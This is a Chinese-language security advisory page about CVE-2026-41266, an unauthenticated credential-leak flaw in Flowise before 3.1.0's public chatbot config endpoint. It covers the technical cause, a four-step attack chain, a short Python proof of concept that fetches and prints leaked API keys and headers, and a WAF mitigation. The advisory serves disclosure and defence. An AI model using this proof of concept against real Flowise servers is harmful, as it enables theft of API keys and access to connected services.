IPBUF安全漏洞报告
English
CVE-2026-41266 CVSS 7.5 高危

CVE-2026-41266 Flowise敏感信息泄露漏洞

披露日期: 2026-04-23

漏洞信息

漏洞编号
CVE-2026-41266
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Flowise

相关标签

信息泄露未授权访问FlowiseAPI安全凭证窃取CVE-2026-41266

漏洞概述

Flowise是一款用于构建定制化大语言模型流程的拖拽式UI工具。在3.1.0版本之前,其`/api/v1/public-chatbotConfig/:id`接口存在严重的敏感信息泄露漏洞。该接口在没有任何身份验证机制的情况下,直接暴露了API密钥、HTTP授权头及内部配置信息。攻击者只要能够获取到chatflow的UUID,即可无需任何交互或权限,远程检索存储在密码字段中的凭据及HTTP头部,导致凭证被盗及后续的横向移动风险。

技术细节

该漏洞的根本原因在于Flowise未对用于获取公开聊天机器人配置的API端点实施严格的访问控制策略。在受影响的版本中,`/api/v1/public-chatbotConfig/:id`接口将包含敏感凭证的完整配置对象返回给请求者,而未校验请求者的身份或权限。尽管前端界面可能会隐藏密码字段,但后端API直接以JSON格式明文返回了包括OpenAI API Key、自定义HTTP Header等关键数据。利用方式极为简单,攻击者只需向目标服务器发送包含目标Chatflow UUID的HTTP GET请求。由于该漏洞无需用户交互且攻击复杂度低,任何知道UUID的人都可以轻易获取系统的高权限凭据,进而接管关联的第三方服务。具体来说,当请求到达服务器时,后端逻辑直接根据ID查询数据库或内存中的配置,并序列化为JSON响应。这破坏了机密性原则,使得本应受保护的配置数据变成了公开数据。攻击者获取这些凭据后,不仅可以直接调用外部AI服务消耗配额,还可能利用泄露的HTTP头信息攻击集成的内部系统。

攻击链分析

STEP 1
信息收集
攻击者发现目标的Flowise服务,并通过枚举或社会工程学等方式获取到目标Chatflow的UUID。
STEP 2
漏洞利用
攻击者构造HTTP GET请求,直接访问`/api/v1/public-chatbotConfig/<UUID>`接口,无需提供任何认证凭证。
STEP 3
数据窃取
服务器返回包含敏感配置的JSON数据,攻击者从中提取API Key、HTTP Authorization Header等关键凭据。
STEP 4
后续攻击
利用窃取的凭据访问外部AI服务(如OpenAI)或集成的内部系统,进行数据窃取、恶意操作或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-41266 Proof of Concept # Target Flowise instance and a valid Chatflow UUID are required target_base_url = "http://<target-ip>:3000" chatflow_uuid = "<valid-chatflow-uuid>" # The vulnerable endpoint vulnerable_endpoint = f"{target_base_url}/api/v1/public-chatbotConfig/{chatflow_uuid}" try: # Send GET request without authentication headers response = requests.get(vulnerable_endpoint, timeout=10) if response.status_code == 200: print("[!] Vulnerability Confirmed!") print("[+] Sensitive data retrieved:") print(response.text) # Parsed JSON will contain apiKeys, httpHeaders, etc. else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施
在无法立即升级的情况下,建议在防火墙或WAF层面对`/api/v1/public-chatbotConfig/`路径实施访问控制,仅允许受信任的内网IP或经过严格认证的代理服务器访问该接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表